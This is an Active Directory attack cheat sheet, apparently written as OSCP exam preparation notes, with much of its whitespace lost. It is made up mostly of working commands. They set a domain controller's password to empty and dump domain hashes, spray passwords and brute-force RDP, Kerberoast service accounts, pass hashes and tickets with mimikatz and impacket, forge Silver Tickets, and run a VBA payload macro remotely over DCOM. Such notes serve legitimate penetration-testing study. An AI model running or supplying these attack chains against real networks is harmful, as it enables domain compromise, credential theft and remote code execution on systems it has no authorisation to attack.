Affects ALL Windows Server versions, but we want to target DCs (high-value).
# set computer account password to an empty string.$python3set_empty_pw.py [dc_computername] [dc_ip]$python3set_empty_pw.pyxor-dc0110.11.1.120# dump domain creds$pythonsecretsdump.py-hashes:[empty_password_hash]'[domain]/[dc_computername]$@[dc_ip]'$pythonsecretsdump.py-hashes:31d6cfe0d16ae931b73c59d7e0c089c0'xor/xor-dc01$@x.x.x.x'
Password Spraying
Dumped plaintext cred or cracked hash for your user?
However, no creds/hashes for other users/SPN to use for lateral movement?
Does the plaintext cred follow some pattern? e.g. IAmUser01, IAmUser02 ...
# test password against all users in the AD, including admins.PS> .\spray-passwords.ps1-Admin-PassIamUser01PS> .\spray-passwords.ps1-Admin-PassIamUser02...
If there are too many users/passwords to manually each cred against RDP, use Hydra to bruteforce RDP:
As not all users are part of the "NT AUTHORITY\REMOTE INTERACTIVE LOGON" group.
$ hydra -L users.txt -P pass.txt rdp://[target]
Plaintext Credentials
# RDP clients$rdesktop [target] -d [domain] -u [user] -p [password]$remmina-crdp://[username]:[password]@[target]# WinRM client (used in compromised computer) - ensure WSMAN port 5985 is open on targetPS> winrmquickconfig# start winrm servicePS> winrmsetwinrm/config/Client@{AllowUnencrypted="true"}# allow HTTPPS> Set-ItemWSMan:localhost\client\trustedhosts-value*# trust all hostscmd> winrs-u:[username]-p:[password]-r:http://[target]:5985/wsman"cmd"# execute command# Admin groups but with a "MANDATORY LABEL\MEDIUM" context?# Try UAC bypass technique.# See https://github.com/brianlam38/OSCP-2022/blob/main/cheatsheet-main.md#user-account-control-uac-bypass
Service Account Attacks
If we know the serviceprincipalname value from prior AD enum, we can target the SPN by by requesting a service ticket for it from the Domain Controller and access resources from the service with our own ticket.
# request service ticketPS> Add-Type-AssemblyNameSystem.IdentityModelPS> New-ObjectSystem.IdentityModel.Tokens.KerberosRequestorSecurityToken \-ArgumentList'[service_principal_name]'# export cached ticketsmimikatz>kerberos::list/export
Crack SPN hashes
# Kerberoast$python3tgsrepcrack.pyrockyou.txt [ticket.kirbi] # locally crack hashesPS> Invoke-Kerberoast.ps1# crack hashes on target# John the Ripper$python3kirbi2john.py-ojohncrackfileticket.kirbi# convert ticket to john file$john--wordlist=rockyou.txtjohncrackfile
Pass the Hash
(NTLM based AuthN)
Requires user/service account to have local admin rights on target, as connection is made using the Admin$ share.
Requires SMB connection through the firewall
Requires Windows File and Print Sharing feature to be enabled.
Attack path: obtain a user's NTLM hash -> start new cmd/ps process as user -> request Kerberos TGT as user -> code exec on any machine where the user has permissions.
Requirement: user/service account to have local admin on target machine.
Useful when Kerberos is the only authentication mechanism allowed in a target (NTLM authN disabled).
psexec.exe requires local admin rights as it accesses admin$ share.
NOTE: We can only use the TGT on the machine it was created for.
OPTH via. COMPROMISED HOST
### WITH MIMIKATZ ON COMPROMISED HOSTmimikatz>sekurlsa::logonpasswords# obtain NTLM hashmimikatz>sekurlsa::pth# create new PS process in context of target user/user:[user_name]/domain:[domain_name]/ntlm:[hash_value]/run:PowerShell.exe# (new PS window, but on same host)PS> klist# should show no TGT/TGSPS> netuse \\dc01 (try othercomps/targets) # generate TGT by authN to network share on the computerPS> klist# now should show TGT/TGSPS> .\PsExec.exe \\[computer]cmd.exe# use TGT to perform code exec against# target which user has permissions on.# (as Psexec does not accept hashes)
OPTH via. KALI
# [OPTION 1 TICKET RETRIEVAL] Request the TGT with hash$pythongetTGT.py<domain_name>/<user_name>-hashes [lm_hash]:<ntlm_hash># Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)$pythongetTGT.py<domain_name>/<user_name>-aesKey<aes_key># Request the TGT with password$pythongetTGT.py<domain_name>/<user_name>:[password]# If not provided, password is asked# [OPTION 2 TICKET RETRIEVAL] export tickets -> copy to Kalimimikatz> sekurlsa::tickets/exportcmd> copy [ticket.kirbi] \\192.168.119.XXX\share\[ticket.kirbi]# use ticket_converter.py to convert .kirbi to .ccache# https://github.com/Zer1t0/ticket_converter$pythonticket_converter.pyticket.kirbiticket.ccache# Set the TGT for impacket use$exportKRB5CCNAME=<TGT_ccache_file># execute remote commands with any of the following by using the TGT$pythonpsexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-pass$pythonsmbexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-pass$pythonwmiexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-pass
Pass the Ticket
(Kerberos-based AuthN)
Pass-the-Ticket takes advantage of the TGS by exporting service tickets, injecting them into memory (on target) or caching as environment variable (on Kali) and then authenticating with the injected/cached ticket via. Kerberos-based authN as opposed to NTLM-based authN.
This attack does not require the service/user to have local admin rights on the target.
PTT via. COMPROMISED HOST (exporting -> inject into memory -> psexec.exe)
# METHOD 1: Mimikatzmimikatz> sekurlsa::tickets/export# export ticketsmimikatz> kerberos::ptt [ticket_name.kirbi] # inject into memorycmd> psexec.exe \\target.hostname.comcmd# authN to remote target using ticket# METHOD 2: Rubeuscmd> Rubeus.exeasktgt/domain:<domain_name>/user:<user_name>/rc4:<ntlm_hash>/ptt
PTT via. KALI (exporting -> cache as env var -> psexec.py/smbexec.py/wmiexec.py)
# export tickets -> copy to Kalimimikatz> sekurlsa::tickets/exportcmd> copy [ticket.kirbi] \\192.168.119.XXX\share\[ticket.kirbi]# use ticket_converter.py to convert .kirbi to .ccache# https://github.com/Zer1t0/ticket_converter$pythonticket_converter.pyticket.kirbiticket.ccache# Set the ticket for impacket useexport KRB5CCNAME=<TGT_ccache_file_path># Execute remote commands with any of the following by using the TGTpythonpsexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-passpythonsmbexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-passpythonwmiexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-pass
Silver Ticket
Silver Tickets enable an attacker to create forged service tickets (TGS tickets)
In this attack, user/group permissions in a Service Ticket are blindly trusted by the application on a target server running in the context of the service account. We forge our own Service Ticket (Silver Ticket) to access the resource (e.g. IIS app, MSSQL app) with any permissions we want. If the SPN/service account is used across multiple servers, we can leverage our Silver Ticket against all.
# generate the Silver Ticket with NTLM$pythonticketer.py-nthash<ntlm_hash>-domain-sid<domain_sid>-domain<domain_name>-spn<service_spn><user_name># set the ticket for impacket use$exportKRB5CCNAME=<TGT_ccache_file_path># execute remote commands with any of the following by using the TGT$pythonpsexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-pass$pythonsmbexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-pass$pythonwmiexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-pass
Distributed Component Object Model (DCOM)
DCOM allows a computer to run programs over the network on a different computer e.g. Excel/PowerPoint/Outlook
Requires RPC port 135 and local admin access to call the DCOM Service Control Manager - the API.
The run method within DCOM allows us to execute a VBA macro remotely.
# create instance of Excel.Application object$com [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application","[target_workstation]"))# copy Excel file containing VBA payload to target$LocalPath = "C:\Users\[user]\badexcel.xls$RemotePath = "\\[target]\c$\badexcel.xls[System.IO.File]::Copy($LocalPath, $RemotePath, $True)# create a SYSTEM profile - required as part of the opening process$path = "\\[target]\c$\Windows\sysWOW64\config\systemprofile\Desktop"$temp = [system.io.directory]::createDirectory($Path)# open Excel file and execute macro$Workbook = $com.Workbooks.Open("C:\myexcel.xls")$com.Run("mymacro")
# obtain SID of domain (remove RID -XXXX) at the end of the user SID string.cmd> whoami/usercorp\offsecS-1-5-21-1602875587-2787523311-2599479668# clean every kerberos existing ticketsmimikatz>kerberos::purge# verify the purgemimikatz>kerberos::list# generate the Silver Ticket (TGS) and inject it into memorymimikatz>kerberos::golden/user:[user_name]/domain:[domain_name].com/sid:[sid_value]/target:[service_hostname]/service:[service_type]/rc4:[hash]/ptt# abuse Silver Ticket (TGS)cmd> psexec.exe-accepteula \\<remote_hostname>cmd# psexeccmd> sqlcmd.exe-S [service_hostname] # if service is MSSQL